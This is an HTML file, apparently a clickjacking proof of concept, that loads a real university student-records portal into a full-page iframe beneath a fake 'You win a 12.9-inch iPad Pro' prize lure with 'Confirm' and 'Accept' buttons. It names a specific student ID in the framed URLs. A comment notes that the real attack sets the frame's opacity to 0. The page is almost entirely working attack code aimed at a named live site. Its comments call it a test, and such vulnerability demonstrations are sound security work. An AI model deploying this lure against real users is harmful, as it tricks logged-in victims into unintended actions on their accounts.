index.html

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
	<!-- for testing purposes -->
<!-- <p>Website is vulnerable to clickjacking!</p> -->
<!-- <iframe src="https://acad.app.vanderbilt.edu/student-search/StudentLanding.action?commodoreId=C05526610" width="500" height="500"></iframe> -->

<style>
iframe { /* iframe from the victim site */
  width: 100%;
  height: 100%;
  position: absolute;
  top:0; left:-0;
  opacity: 0.5; /* in real opacity:0 */
  z-index: 1;
}
h3{
	font-size: 3em;
	margin: 1em;
	text-align: center;
	font-weight: normal;
	font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
}
.in-cart {
	top: 19%;
  left: 58%;
  position: absolute;
}
.drop {
  top: 40%;
  left: 80%;
  position: absolute;
}
.ipad {
	width: 40%;
	position: absolute;
	top: 13%;
	left: 8%;
}
.ipad2 {
	width: 40%;
	position: absolute;
	top: 28%;
	left: 46%;
	z-index: 0;
}

button {
    display: inline-block;
    border: 1px solid #ccc;
    border-radius: 30px;
    padding: 0.5rem 2rem;
    margin: 0;
    text-decoration: none;
    font-size: 1rem;
    cursor: pointer;
    text-align: center;
    transition: background 250ms ease-in-out, 
                transform 150ms ease;
    -webkit-appearance: none;
    -moz-appearance: none;
}
</style>

<h3>You win a 12.9-inch iPad Pro 🎉</h3>

<!-- The url from the victim site -->
<iframe src="https://acad.app.vanderbilt.edu/more/SearchClasses!input.action?commodoreIdToLoad=C05526610"></iframe>
<!-- <iframe src="https://yes.vanderbilt.edu" /> </iframe> -->
<img class="ipad" src='https://store.storeimages.cdn-apple.com/4982/as-images.apple.com/is/ipad-pro-11-select-wifi-spacegray-201810_FMT_WHH?wid=940&hei=1112&fmt=png-alpha&qlt=80&.v=1540591835446' />
<img class="ipad2" src='https://store.storeimages.cdn-apple.com/4982/as-images.apple.com/is/ipad-banner-pencil-201810?wid=1144&hei=892&fmt=jpeg&qlt=80&op_usm=0.5,0.5&.v=1540344564922' />
<button class="in-cart">Confirm </button>
<button class="drop">Accept</button>

</body>
</html>